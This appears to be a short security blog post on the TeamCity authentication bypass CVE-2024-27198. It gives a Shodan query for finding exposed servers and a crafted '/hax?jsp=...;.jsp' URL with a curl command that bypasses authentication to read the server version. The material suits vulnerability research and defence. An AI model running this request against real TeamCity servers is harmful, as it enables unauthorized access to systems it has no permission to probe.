CVE-2024–27198 || TeamCity

CVE-2024–27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue(CWE-288) and has a CVSS base score of 9.8 (Critical).

A Shodan search on TeamCity reveals around 2230 instances exposed to the internet.

Shodan Query: http.component:”teamcity”

Let’s see how to find version for TeamCity server:

1. Take IP from the above shodan query
2. Append following string with IP address: /hax?jsp=/app/rest/server;.jsp

Example: http://10.10.20.30:8111/hax?jsp=/app/rest/server;.jsp

3. Now we can utilize CURL to make above request and it will look like.

curl -ik http://10.10.20.30:8111/hax?jsp=/app/rest/server;.jsp

4. In response we might encounter response code “403”, in other cases we might get response in which we can identify Teamcity server version.

References:

1. https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
2. https://nvd.nist.gov/vuln/detail/CVE-2024-27198
3. https://blog.jetbrains.com/teamcity/2024/03/teamcity-2023-11-4-is-out/